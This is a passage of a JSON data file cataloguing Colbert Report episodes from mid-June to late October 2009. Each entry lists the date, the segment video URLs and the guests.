      "videos": [
        "http://thecolbertreport.cc.com/videos/ewcaj5/intro---06-18-09",
        "http://thecolbertreport.cc.com/videos/0qwej8/murder-in-the-white-house---jeff-goldblum",
        "http://thecolbertreport.cc.com/videos/nmpsnk/bears---balls---tobacco--project-natal---graveyard-bids",
        "http://thecolbertreport.cc.com/videos/e8rev9/paul-muldoon",
        "http://thecolbertreport.cc.com/videos/dvld1q/sign-off---law---order-preview",
        "http://thecolbertreport.cc.com/videos/e8h8e5/murder-in-the-white-house---fly-widow-interview",
        "http://thecolbertreport.cc.com/videos/e72lp2/sign-off---aloha--idaho"
      ],
      "guest": "Paul Muldoon"
    },
    {
      "date": "2009-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/je4uya/intro---06-22-09",
        "http://thecolbertreport.cc.com/videos/91fk6r/zicam-recall",
        "http://thecolbertreport.cc.com/videos/h9527k/the-enemy-within---cane-fu",
        "http://thecolbertreport.cc.com/videos/he9dc0/simon-schama",
        "http://thecolbertreport.cc.com/videos/k4vrsb/sign-off---stephen-suffers--too"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2009-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wovkbp/barack-obama-s-response-to-iran",
        "http://thecolbertreport.cc.com/videos/yaknra/america-s-health-plan-demic",
        "http://thecolbertreport.cc.com/videos/xc1sqp/governor-alert---the-search-for-mark-sanford",
        "http://thecolbertreport.cc.com/videos/fmv6yq/david-kilcullen",
        "http://thecolbertreport.cc.com/videos/i99yp3/the-smell-of-freedom---jeff-goldblum"
      ],
      "guest": "Howard Dean, David Kilcullen"
    },
    {
      "date": "2009-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rhiizu/intro---06-24-09",
        "http://thecolbertreport.cc.com/videos/5xejpe/mark-sanford-does-something-interesting",
        "http://thecolbertreport.cc.com/videos/neths8/matthew-crawford",
        "http://thecolbertreport.cc.com/videos/i50dum/sign-off---random-gps-coordinate-lottery",
        "http://thecolbertreport.cc.com/videos/jkobj5/america-s-health-plan-demic---howard-dean",
        "http://thecolbertreport.cc.com/videos/411cqv/sign-off---goodnight"
      ],
      "guest": "Matthew Crawford"
    },
    {
      "date": "2009-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j1tx3a/intro---06-25-09",
        "http://thecolbertreport.cc.com/videos/g71yl5/gay-demon-on-the-loose",
        "http://thecolbertreport.cc.com/videos/5gki1y/commonsense-health-care-reform-infomercial",
        "http://thecolbertreport.cc.com/videos/ohjhjq/jim-fouratt",
        "http://thecolbertreport.cc.com/videos/l3h2eg/sign-off---one-breath",
        "http://thecolbertreport.cc.com/videos/nw0bxn/sport-report---soccer--tennis---brett-favre"
      ],
      "guest": "Jim Fouratt"
    },
    {
      "date": "2009-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ehxpq9/jeff-goldblum-will-be-missed",
        "http://thecolbertreport.cc.com/videos/di8fs8/michael-jackson-s-media-attention",
        "http://thecolbertreport.cc.com/videos/8ouc6a/the-word---noncensus",
        "http://thecolbertreport.cc.com/videos/4zr9io/neil-degrasse-tyson"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2009-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/klvpw6/intro---06-30-09",
        "http://thecolbertreport.cc.com/videos/hy9hl7/al-franken-finally-declared-senator",
        "http://thecolbertreport.cc.com/videos/hzd5cg/4th-of-july-under-attack",
        "http://thecolbertreport.cc.com/videos/jzev8y/is-it-time-to-care-about-soccer-",
        "http://thecolbertreport.cc.com/videos/knfvfz/is-it-time-to-care-about-soccer----alexi-lalas",
        "http://thecolbertreport.cc.com/videos/8x5ezx/kevin-mattson",
        "http://thecolbertreport.cc.com/videos/ehxpq9/jeff-goldblum-will-be-missed"
      ],
      "guest": "Alexi Lalas, Kevin Mattson"
    },
    {
      "date": "2009-07-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umpd2x/intro---07-01-09",
        "http://thecolbertreport.cc.com/videos/opbzv4/the-second-coming-of-ronald-reagan",
        "http://thecolbertreport.cc.com/videos/6wo5t4/the-clinton-curse",
        "http://thecolbertreport.cc.com/videos/heqh3g/judge--jury---executioner---firefighters--gold-waste---strip-search",
        "http://thecolbertreport.cc.com/videos/r9zau8/nicholas-kristof",
        "http://thecolbertreport.cc.com/videos/sldptb/sign-off---farewell--david-souter"
      ],
      "guest": "Nicholas Kristof"
    },
    {
      "date": "2009-07-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f4016f/intro---07-02-09",
        "http://thecolbertreport.cc.com/videos/mc9la4/cnn-finds-bubbles-the-chimp",
        "http://thecolbertreport.cc.com/videos/n31uuy/re-report---lost-treasures-of-babylon",
        "http://thecolbertreport.cc.com/videos/v5trw8/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/zc3q4z/sign-off---see-you-at-the-bar",
        "http://thecolbertreport.cc.com/videos/sedae1/tip-wag---cynthia-davis---fox-news",
        "http://thecolbertreport.cc.com/videos/wyj1b1/sign-off---get-your-illegal-fireworks"
      ],
      "guest": "Ed Viesturs"
    },
    {
      "date": "2009-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4zm73s/intro---07-13-09",
        "http://thecolbertreport.cc.com/videos/m8x1rr/va-backlog---paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/qvijip/paul-krugman",
        "http://thecolbertreport.cc.com/videos/2wjc98/goodnight"
      ],
      "guest": "Paul Rieckhoff, Paul Krugman"
    },
    {
      "date": "2009-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w7y41r/intro---07-14-09",
        "http://thecolbertreport.cc.com/videos/17wwbv/raise-high-the-rage-beams",
        "http://thecolbertreport.cc.com/videos/o7y2te/leymah-gbowee",
        "http://thecolbertreport.cc.com/videos/9nhp7n/sign-off---the-pitcher-in-the-oat",
        "http://thecolbertreport.cc.com/videos/55a0ws/remembering-remembering-michael-jackson",
        "http://thecolbertreport.cc.com/videos/bfjyjy/stephen-s-sound-advice---how-to-bork-a-nominee"
      ],
      "guest": "Leymah Gbowee"
    },
    {
      "date": "2009-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/38zw9a/intro---07-15-09",
        "http://thecolbertreport.cc.com/videos/7avxb3/stephen-wants-to-be-the-worst-person-in-the-world",
        "http://thecolbertreport.cc.com/videos/yhsbjx/difference-makers---doug-jackson",
        "http://thecolbertreport.cc.com/videos/jkayfy/douglas-rushkoff",
        "http://thecolbertreport.cc.com/videos/1ikoxj/sign-off---no-man-is-a-failure",
        "http://thecolbertreport.cc.com/videos/9vyt62/senator-wences-questions-sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/jb4xw4/the-word---guns--credit--and-corn"
      ],
      "guest": "Douglas Rushkoff"
    },
    {
      "date": "2009-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n291gl/intro---07-16-09",
        "http://thecolbertreport.cc.com/videos/7pmbq4/the-memy-awards",
        "http://thecolbertreport.cc.com/videos/3ahlmo/cheating-death---diabetes-dogs--chocolate-milk---swearing-in-pain",
        "http://thecolbertreport.cc.com/videos/7hp904/edmund-andrews",
        "http://thecolbertreport.cc.com/videos/1wc2dn/sign-off---stephen-wins",
        "http://thecolbertreport.cc.com/videos/cqz0pq/tip-wag---assassination-squads--biblical-history---gay-penguins"
      ],
      "guest": "Edmund Andrews"
    },
    {
      "date": "2009-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z5a6bx/walter-cronkite-remembered",
        "http://thecolbertreport.cc.com/videos/0a6zq6/reverse-racism",
        "http://thecolbertreport.cc.com/videos/wqv2b7/sport-report---jessica-simpson--olympic-brothel---bud-light",
        "http://thecolbertreport.cc.com/videos/bowvin/bob-park",
        "http://thecolbertreport.cc.com/videos/x2ppm1/sign-off---goodnight"
      ],
      "guest": "Geoffrey Canada, Bob Park"
    },
    {
      "date": "2009-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/78h601/intro---07-21-09",
        "http://thecolbertreport.cc.com/videos/1egi6s/40th-anniversary-of-the-moon-landing",
        "http://thecolbertreport.cc.com/videos/puckfx/better-know-a-lobby---acorn",
        "http://thecolbertreport.cc.com/videos/gwtxoo/aaron-carroll",
        "http://thecolbertreport.cc.com/videos/o84f1o/sign-off---stephen-s-chip",
        "http://thecolbertreport.cc.com/videos/hmh0yy/reverse-racism---geoffrey-canada"
      ],
      "guest": "Dr. Aaron Carroll"
    },
    {
      "date": "2009-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j9y28p/intro---07-22-09",
        "http://thecolbertreport.cc.com/videos/43yfk6/the-longest-solar-eclipse-of-the-century",
        "http://thecolbertreport.cc.com/videos/8st941/sniper-trifle---matthew-waxman",
        "http://thecolbertreport.cc.com/videos/gda2z2/pope-wrist-watch",
        "http://thecolbertreport.cc.com/videos/hlljrv/chris-anderson",
        "http://thecolbertreport.cc.com/videos/tzs7et/the-word---a-perfect-world"
      ],
      "guest": "Matthew Waxman, Chris Anderson"
    },
    {
      "date": "2009-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/abmeny/health-care-reform-is-the-matrix",
        "http://thecolbertreport.cc.com/videos/al2ar6/health-care-hell-scare---die-agnosis--mur-dr",
        "http://thecolbertreport.cc.com/videos/lb7ei8/sign-off---tivo",
        "http://thecolbertreport.cc.com/videos/l3lw8t/sniper-trifle",
        "http://thecolbertreport.cc.com/videos/1y6s8z/sign-off---goodnight"
      ],
      "guest": "Zev Chafets"
    },
    {
      "date": "2009-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g64g5i/intro---07-27-09",
        "http://thecolbertreport.cc.com/videos/bx3wyo/sarah-palin-will-be-missed",
        "http://thecolbertreport.cc.com/videos/5mjokj/nailed--em---library-crime",
        "http://thecolbertreport.cc.com/videos/c4hocz/movits-"
      ],
      "guest": "Movits"
    },
    {
      "date": "2009-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nwsa83/president-obama-s-teachable-moment",
        "http://thecolbertreport.cc.com/videos/574gc1/womb-raiders---the-fight-for-the-truth-behind-obama-s-birth",
        "http://thecolbertreport.cc.com/videos/wg36jw/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/aayh4c/sign-off---devil-s-tricks",
        "http://thecolbertreport.cc.com/videos/g64g5i/intro---07-27-09"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2009-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n0hvmj/intro---07-29-09",
        "http://thecolbertreport.cc.com/videos/em0er2/frank-the-roommate",
        "http://thecolbertreport.cc.com/videos/hw67wd/sport-report---tour-de-france---robotic-baseball",
        "http://thecolbertreport.cc.com/videos/2dvjk4/kevin-baker",
        "http://thecolbertreport.cc.com/videos/h00qyf/sign-off---watch-without-blinking",
        "http://thecolbertreport.cc.com/videos/zafhtu/womb-raiders---orly-taitz"
      ],
      "guest": "Kevin Baker"
    },
    {
      "date": "2009-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jdw6pa/intro---07-30-09",
        "http://thecolbertreport.cc.com/videos/uq6k19/white-house-beer-summit",
        "http://thecolbertreport.cc.com/videos/fmie7p/tip-wag---man-words---movits-",
        "http://thecolbertreport.cc.com/videos/g75n20/kathryn-bigelow",
        "http://thecolbertreport.cc.com/videos/2mqpw1/sign-off---taco-bell-spokesdog",
        "http://thecolbertreport.cc.com/videos/10c870/the-word---he-who-smelt-it--dealt-it"
      ],
      "guest": "Kathryn Bigelow"
    },
    {
      "date": "2009-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6tkw9s/intro---08-03-09",
        "http://thecolbertreport.cc.com/videos/g2s68c/dominic-philip-s-book-habit",
        "http://thecolbertreport.cc.com/videos/kc14p7/nailed--em---war-on-birth-control",
        "http://thecolbertreport.cc.com/videos/yre45i/tony-zinni",
        "http://thecolbertreport.cc.com/videos/vv0gs6/sign-off---goodnight"
      ],
      "guest": "Gen. Tony Zinni"
    },
    {
      "date": "2009-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2qha08/merry-barackmas",
        "http://thecolbertreport.cc.com/videos/wyon84/the-word---hippie-replacement",
        "http://thecolbertreport.cc.com/videos/m1d4yt/kurt-andersen",
        "http://thecolbertreport.cc.com/videos/e8glog/sign-off---love-makes-the-world-go-round",
        "http://thecolbertreport.cc.com/videos/lqp674/bears---balls---how-to-pay-for-health-care"
      ],
      "guest": "Kurt Andersen"
    },
    {
      "date": "2009-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dozbxd/bill-clinton-s-personal-appearance",
        "http://thecolbertreport.cc.com/videos/pedumk/2010-midterms---joe-sestak",
        "http://thecolbertreport.cc.com/videos/8s2cpt/kris-kobach",
        "http://thecolbertreport.cc.com/videos/5f7tro/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/7wxgsg/colbert-bump-cocktail---david-wondrich"
      ],
      "guest": "Kris Kobach"
    },
    {
      "date": "2009-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vesroc/intro---08-06-09",
        "http://thecolbertreport.cc.com/videos/7qrkub/back-to-school-with-jeremih",
        "http://thecolbertreport.cc.com/videos/04qijm/movies-that-are-destroying-america---summer",
        "http://thecolbertreport.cc.com/videos/zar0yt/meryl-streep",
        "http://thecolbertreport.cc.com/videos/diktol/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/updeyd/human-week"
      ],
      "guest": "Meryl Streep"
    },
    {
      "date": "2009-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gaywhl/intro---08-10-09",
        "http://thecolbertreport.cc.com/videos/0aiuqk/death-panels",
        "http://thecolbertreport.cc.com/videos/1d8uxl/better-know-a-district---maine-s-1st---chellie-pingree",
        "http://thecolbertreport.cc.com/videos/klodac/barbara-boxer",
        "http://thecolbertreport.cc.com/videos/9r0u01/sign-off---encore"
      ],
      "guest": "Sen. Barbara Boxer"
    },
    {
      "date": "2009-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1qhrzu/intro---08-11-09",
        "http://thecolbertreport.cc.com/videos/tq0ixs/stephen-s-driving-tips-via-twitter-service",
        "http://thecolbertreport.cc.com/videos/kc7xgf/alpha-dog-of-the-week---betty-lichtenstein",
        "http://thecolbertreport.cc.com/videos/0ivmu5/jonathan-cohn",
        "http://thecolbertreport.cc.com/videos/9pu9xl/sign-off---prevent-forest-fires",
        "http://thecolbertreport.cc.com/videos/dra60l/cold-war-update---cuba---topless-putin"
      ],
      "guest": "Jonathan Cohn"
    },
    {
      "date": "2009-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9g2evg/intro---08-12-09",
        "http://thecolbertreport.cc.com/videos/cypmfk/americans-sacrifice-their-ipods",
        "http://thecolbertreport.cc.com/videos/5esjcx/formidable-opponent---health-care---burger-king",
        "http://thecolbertreport.cc.com/videos/53n2qf/mark-johnson",
        "http://thecolbertreport.cc.com/videos/j153gh/yes-we-afghan---james-carville"
      ],
      "guest": "Mark Johnson"
    },
    {
      "date": "2009-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3rk7mk/intro---08-13-09",
        "http://thecolbertreport.cc.com/videos/d9wypw/sheila-jackson-lee-takes-a-phone-call",
        "http://thecolbertreport.cc.com/videos/1fblyv/cheating-death---blue-m-ms--vitamin-d---hormones",
        "http://thecolbertreport.cc.com/videos/pfw8xc/mark-devlin",
        "http://thecolbertreport.cc.com/videos/xagarl/sign-off---stephen-s-online-information",
        "http://thecolbertreport.cc.com/videos/8bsp4q/who-s-not-honoring-me-now----obama--nra---teen-choice-awards"
      ],
      "guest": "Mark Devlin"
    },
    {
      "date": "2009-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu8yuk/intro---08-17-09",
        "http://thecolbertreport.cc.com/videos/54nh4d/obama-publishes-health-care-op-ed",
        "http://thecolbertreport.cc.com/videos/xe1vuk/even-better-er-know-a-district---colorado-s-2nd---jared-polis",
        "http://thecolbertreport.cc.com/videos/p4m942/bill-mckibben",
        "http://thecolbertreport.cc.com/videos/rasuqa/sign-off---goodnight"
      ],
      "guest": "Bill McKibben"
    },
    {
      "date": "2009-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wagj66/intro---08-18-09",
        "http://thecolbertreport.cc.com/videos/wu0pjh/hamid-karzai-endorsement",
        "http://thecolbertreport.cc.com/videos/z3d9c9/tip-wag---german-campaign--russian-dogs---flying-rabbis",
        "http://thecolbertreport.cc.com/videos/xjhfzn/robert-wright",
        "http://thecolbertreport.cc.com/videos/nw5bk3/sign-off--shofar",
        "http://thecolbertreport.cc.com/videos/79rlpw/the-word---must-be-tv"
      ],
      "guest": "Robert Wright"
    },
    {
      "date": "2009-08-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu5hos/barney-frank-refuses-to-talk-to-a-dining-room-table",
        "http://thecolbertreport.cc.com/videos/f6lol5/sugar-shortage---marion-nestle",
        "http://thecolbertreport.cc.com/videos/ckefur/ang-lee",
        "http://thecolbertreport.cc.com/videos/qwyqmu/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/jrwpha/the-word---arch-enemies"
      ],
      "guest": "Ang Lee"
    },
    {
      "date": "2009-08-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/om1fcy/intro---08-20-09",
        "http://thecolbertreport.cc.com/videos/bgxuqk/france-bans-elephants",
        "http://thecolbertreport.cc.com/videos/ho2y6d/stephen-s-sound-advice---how-to-make-babies",
        "http://thecolbertreport.cc.com/videos/3muzmh/chris-matthews",
        "http://thecolbertreport.cc.com/videos/gv0u6s/sign-off---vacation-begins",
        "http://thecolbertreport.cc.com/videos/k1zrq2/colbert-platinum---urbane-nomads--gigayacht---michael-jackson-diamond"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2009-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dq2vzv/intro---09-14-09",
        "http://thecolbertreport.cc.com/videos/npiiku/conservatives-are-back",
        "http://thecolbertreport.cc.com/videos/ehltxr/kanye-west-interrupts-taylor-swift-at-the-vmas",
        "http://thecolbertreport.cc.com/videos/ljbubg/cory-booker",
        "http://thecolbertreport.cc.com/videos/4kq9de/sign-off---goodnight"
      ],
      "guest": "Cory Booker"
    },
    {
      "date": "2009-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/drgqxg/world-record-for-mexican-insults",
        "http://thecolbertreport.cc.com/videos/c9v1s6/the-word---let-freedom-ka-ching",
        "http://thecolbertreport.cc.com/videos/qm9oq3/christiane-amanpour",
        "http://thecolbertreport.cc.com/videos/tcjp92/stephen-loses-world-record-to-lou-dobbs",
        "http://thecolbertreport.cc.com/videos/hen1ip/better-know-a-lobby---health-care-for-america-now"
      ],
      "guest": "Christiane Amanpour"
    },
    {
      "date": "2009-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ch7xyz/intro---09-16-09",
        "http://thecolbertreport.cc.com/videos/dp3jiw/body-worlds-plans-cadaver-sex-exhibit",
        "http://thecolbertreport.cc.com/videos/p1ugzo/figgy-moonpowder",
        "http://thecolbertreport.cc.com/videos/1642tt/wayne-coyne",
        "http://thecolbertreport.cc.com/videos/pafbhp/citizens-united-v--federal-election-commission---jeffrey-toobin"
      ],
      "guest": "The Flaming Lips"
    },
    {
      "date": "2009-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oclyoo/goat-lab",
        "http://thecolbertreport.cc.com/videos/5psdx6/goat-lab---jon-ronson",
        "http://thecolbertreport.cc.com/videos/3zmd8j/frank-bruni",
        "http://thecolbertreport.cc.com/videos/xl4dp2/i-s-on-edjukashun---muslim-textbooks---tony-danza"
      ],
      "guest": "Frank Bruni"
    },
    {
      "date": "2009-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fscepw/intro---09-22-09",
        "http://thecolbertreport.cc.com/videos/brwe58/atone-phone---emmy-awards",
        "http://thecolbertreport.cc.com/videos/h3pbsv/atone-phone---jon-stewart-calls-to-apologize",
        "http://thecolbertreport.cc.com/videos/oqiy0y/shai-agassi",
        "http://thecolbertreport.cc.com/videos/zxvw0a/sign-off---shofar-goodnight"
      ],
      "guest": "Shai Agassi"
    },
    {
      "date": "2009-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/epco4o/lunatic-dictator-accommodations",
        "http://thecolbertreport.cc.com/videos/xtts8p/capitalism-s-enemy---michael-moore",
        "http://thecolbertreport.cc.com/videos/hwx2pv/aj-jacobs",
        "http://thecolbertreport.cc.com/videos/8ch7no/sign-off---thank-you-for-joining-us",
        "http://thecolbertreport.cc.com/videos/npdo9z/tip-wag---guns-on-amtrak--fake-lesbians---battleship-audition"
      ],
      "guest": "Michael Moore, A.J. Jacobs"
    },
    {
      "date": "2009-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/92d7p3/intro---09-24-09",
        "http://thecolbertreport.cc.com/videos/srdbkv/atone-phone---larry-king-calls",
        "http://thecolbertreport.cc.com/videos/f4xrhk/easter-under-attack---peeps-display",
        "http://thecolbertreport.cc.com/videos/xqer72/ken-burns",
        "http://thecolbertreport.cc.com/videos/cqqzqe/sign-off---automated-desk",
        "http://thecolbertreport.cc.com/videos/rh4p4f/tom-delay-dances-with-the-stars"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2009-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ph4cw3/atone-phone---last-day-of-apologies",
        "http://thecolbertreport.cc.com/videos/89wc6t/do--dump-or-marry",
        "http://thecolbertreport.cc.com/videos/r9at2m/sheryl-wudunn",
        "http://thecolbertreport.cc.com/videos/wsefin/sign-off---goodnight--conan"
      ],
      "guest": "Sheryl WuDunn"
    },
    {
      "date": "2009-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8qd7gf/intro---09-29-09",
        "http://thecolbertreport.cc.com/videos/4bcajc/spider-pope",
        "http://thecolbertreport.cc.com/videos/22jcm5/cheating-death---snus---placebo-effect",
        "http://thecolbertreport.cc.com/videos/03ei16/matt-latimer",
        "http://thecolbertreport.cc.com/videos/7bmnxg/sign-off---richard-dawkins-will-be-here-tomorrow",
        "http://thecolbertreport.cc.com/videos/ph4cw3/atone-phone---last-day-of-apologies"
      ],
      "guest": "Matt Latimer"
    },
    {
      "date": "2009-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6bhu7e/intro---09-30-09",
        "http://thecolbertreport.cc.com/videos/rrbojv/send-your-medical-bills-to-max-baucus",
        "http://thecolbertreport.cc.com/videos/m2yjay/a-pace-odyssey",
        "http://thecolbertreport.cc.com/videos/jhrv69/richard-dawkins",
        "http://thecolbertreport.cc.com/videos/t5u4g8/sign-off---goodnight--grammy",
        "http://thecolbertreport.cc.com/videos/kf4xf5/the-word---out-of-the-closet"
      ],
      "guest": "Richard Dawkins"
    },
    {
      "date": "2009-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wlav1v/najibullah-zazi-threatens-beauty-supplies",
        "http://thecolbertreport.cc.com/videos/6dv0jz/2016-olympics-in-chicago---george-wendt",
        "http://thecolbertreport.cc.com/videos/zxuz0a/francis-collins",
        "http://thecolbertreport.cc.com/videos/q9o9qv/sign-off---new-slang",
        "http://thecolbertreport.cc.com/videos/91s6ka/threatdown---environmentalists--kang-lee---mountain-pine-beetles"
      ],
      "guest": "George Wendt, Dr. Francis Collins"
    },
    {
      "date": "2009-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/733czp/intro---10-05-09",
        "http://thecolbertreport.cc.com/videos/7yi77e/americans-for-prosperity-cheer-chicago-s-failure",
        "http://thecolbertreport.cc.com/videos/k8e7bl/eating-the-distance---the-brad-sciullo-story-pt--2",
        "http://thecolbertreport.cc.com/videos/wfl2if/arne-duncan",
        "http://thecolbertreport.cc.com/videos/d1uxmt/sign-off---goodnight"
      ],
      "guest": "Arne Duncan"
    },
    {
      "date": "2009-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lomf6q/new-swine-flu-vaccine-drops",
        "http://thecolbertreport.cc.com/videos/7060r2/the-road-ahead-in-afghanistan---lara-logan",
        "http://thecolbertreport.cc.com/videos/yz886x/john-darnielle",
        "http://thecolbertreport.cc.com/videos/58l1kv/the-word---learning-is-fundamental"
      ],
      "guest": "Lara Logan, the Mountain Goats"
    },
    {
      "date": "2009-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kt8d60/intro---10-07-09",
        "http://thecolbertreport.cc.com/videos/p6tyac/human-sacrifice-channel",
        "http://thecolbertreport.cc.com/videos/i1e7h0/craziest-f--king-thing-i-ve-ever-heard---eye-tooth",
        "http://thecolbertreport.cc.com/videos/59gyno/alison-gopnik",
        "http://thecolbertreport.cc.com/videos/9ergzb/sign-off---jasper-t--jowls",
        "http://thecolbertreport.cc.com/videos/qm22ls/formula-401--a-star-is-born"
      ],
      "guest": "Alison Gopnik"
    },
    {
      "date": "2009-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ac6rq4/intro---10-08-09",
        "http://thecolbertreport.cc.com/videos/u1v1j7/kevin-the-iranian-intern",
        "http://thecolbertreport.cc.com/videos/jigfye/sport-report---rush-limbaugh---ted-williams--frozen-head",
        "http://thecolbertreport.cc.com/videos/ih4ouf/colin-beavan",
        "http://thecolbertreport.cc.com/videos/7t5ve1/sign-off---buddy-system",
        "http://thecolbertreport.cc.com/videos/81wvda/tip-wag---conservapedia--louvre---honda-unicycle"
      ],
      "guest": "Colin Beavan"
    },
    {
      "date": "2009-10-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6s4gb6/intro---10-12-09",
        "http://thecolbertreport.cc.com/videos/xiuiwd/happy-columbus-day",
        "http://thecolbertreport.cc.com/videos/vnmcv0/fallback-position---james-blake",
        "http://thecolbertreport.cc.com/videos/2ko3eq/sanjay-gupta",
        "http://thecolbertreport.cc.com/videos/izp5gd/sign-off---thanks-to-the-guests"
      ],
      "guest": "Shashi Tharoor, Dr. Sanjay Gupta"
    },
    {
      "date": "2009-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g87deh/intro---10-13-09",
        "http://thecolbertreport.cc.com/videos/4cco61/jermaine-maine-tweets-miley-cyrus-facts",
        "http://thecolbertreport.cc.com/videos/7jpek6/the-born-supremacy---david-javerbaum",
        "http://thecolbertreport.cc.com/videos/s52xb5/sylvia-earle",
        "http://thecolbertreport.cc.com/videos/obxlza/sign-off---gmail",
        "http://thecolbertreport.cc.com/videos/l4n6tb/war-of-peace---shashi-tharoor"
      ],
      "guest": "David Javerbaum, Sylvia Earle"
    },
    {
      "date": "2009-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g6skj6/pat-roberts-warns-against-health-care-box-canyon",
        "http://thecolbertreport.cc.com/videos/3copn0/the-obesity-epidemic---amy-farrell",
        "http://thecolbertreport.cc.com/videos/ljym9p/the-rza",
        "http://thecolbertreport.cc.com/videos/wijvgm/sign-off---should-have-put-a-ring-on-it",
        "http://thecolbertreport.cc.com/videos/m5y3ox/the-word---symbol-minded"
      ],
      "guest": "Amy Farrell, The RZA"
    },
    {
      "date": "2009-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0bzt4y/intro---10-15-09",
        "http://thecolbertreport.cc.com/videos/0a133r/the-money-shot",
        "http://thecolbertreport.cc.com/videos/8xmsj4/the-mayo-lution-will-not-be-televised",
        "http://thecolbertreport.cc.com/videos/7s45sd/jerry-mitchell",
        "http://thecolbertreport.cc.com/videos/sgqznj/sign-off---stephen-unveils-a-new-portrait",
        "http://thecolbertreport.cc.com/videos/ubn9ao/yahweh-or-no-way---legislation-prayers---fake-shroud-of-turin"
      ],
      "guest": "Jerry Mitchell"
    },
    {
      "date": "2009-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4srpg9/george-will-s-long-tie",
        "http://thecolbertreport.cc.com/videos/gy6tin/the-word---don-t-ask-don-t-tell",
        "http://thecolbertreport.cc.com/videos/xhz2mw/cornel-west",
        "http://thecolbertreport.cc.com/videos/2onypd/sign-off---don-t-move"
      ],
      "guest": "Cornel West"
    },
    {
      "date": "2009-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l98jof/intro---10-27-09",
        "http://thecolbertreport.cc.com/videos/3f3ssx/george-w--bush-s-motivational-speech",
        "http://thecolbertreport.cc.com/videos/wtcyjy/colbert-platinum---harvard-billionaires---red-diamond-suv",
        "http://thecolbertreport.cc.com/videos/8c9hx0/gail-collins",
        "http://thecolbertreport.cc.com/videos/plvf84/sign-off---goodnight-",
        "http://thecolbertreport.cc.com/videos/liq1p2/job-recommendation-from-stephen-colbert",
        "http://thecolbertreport.cc.com/videos/dtlk2w/stephen-s-sound-advice---how-to-get-a-job"
      ],
      "guest": "Randall Balmer, Gail Collins"
    },
    {
      "date": "2009-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zspzvk/intro---10-28-09",
        "http://thecolbertreport.cc.com/videos/qvcosm/joe-lieberman-is-a-true-independent",
        "http://thecolbertreport.cc.com/videos/1r96o8/big-bang-theory",
        "http://thecolbertreport.cc.com/videos/3r9su2/brian-cox",
        "http://thecolbertreport.cc.com/videos/bzrvnc/sign-off---future-stephen",
        "http://thecolbertreport.cc.com/videos/1va17m/holy-water-under-the-bridge---randall-balmer"
      ],
      "guest": "Brian Cox"
    },
    {
      "date": "2009-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbj9sz/intro---10-29-09",
        "http://thecolbertreport.cc.com/videos/yl6xd1/usa-today-slams-dirigibles",
        "http://thecolbertreport.cc.com/videos/al6ssq/threatdown---halloween-edition",
        "http://thecolbertreport.cc.com/videos/ku01px/bill-simmons",
